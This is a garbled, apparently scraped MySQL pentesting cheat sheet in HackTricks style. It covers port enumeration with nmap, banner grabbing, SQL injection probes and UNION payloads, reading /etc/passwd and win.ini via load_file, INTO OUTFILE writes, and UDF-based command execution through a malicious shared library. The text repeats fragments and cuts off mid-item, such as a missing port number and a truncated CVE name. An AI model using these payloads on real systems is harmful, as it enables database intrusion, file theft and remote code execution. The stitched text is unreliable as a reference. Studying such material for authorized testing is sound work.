By default, MySQL listens on TCP port . However, obfuscated environments might host it on alternative ports (e.g., 33060 for MySQL X Protocol). Use Nmap to verify the service version and run default enumeration scripts: nmap -sV -sC -p 3306 Use code with caution. Banner Grabbing
: Instructions on using LOAD_FILE() and INTO OUTFILE to read or write local files, which can lead to Remote Code Execution (RCE).
Replace spaces with:
MySQL running as root or with file_priv + write access to plugin_dir . mysql hacktricks verified
CREATE FUNCTION do_system RETURNS INTEGER SONAME 'exploit.so'; SELECT do_system('id > /tmp/out');
The information provided in this article is for educational purposes only. The author and the website do not assume any legal or professional responsibility for the use or misuse of the information provided.
: Always upgrade to MySQL 8.0+ and use SQL SECURITY DEFINER carefully. By default, MySQL listens on TCP port
The INTO OUTFILE clause writes query results to a file on the server. : secure‑file‑priv must be disabled, and MySQL must have write permissions on the target directory.
Used when the application reflects the query results directly on the page. ' ORDER BY 1-- - , ' ORDER BY 2-- - Find data types and reflections: ' UNION SELECT 1,2,3-- -
User‑Defined Functions (UDF) are custom functions that extend MySQL's functionality through dynamically loadable libraries written in C/C++. Attackers can compile and upload malicious shared libraries ( .so on Linux, .dll on Windows) that call system commands, then execute them through SQL. Banner Grabbing : Instructions on using LOAD_FILE() and
' UNION SELECT NULL, load_file('/etc/passwd'), NULL-- - ' UNION SELECT NULL, load_file('C:\\Windows\\win.ini'), NULL-- -
--script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012- Use code with caution. Copied to clipboard Metasploit Scanners: Tools like auxiliary/scanner/mysql/mysql_version can verify remote service details. HackTricks 2. Verified Authentication & Access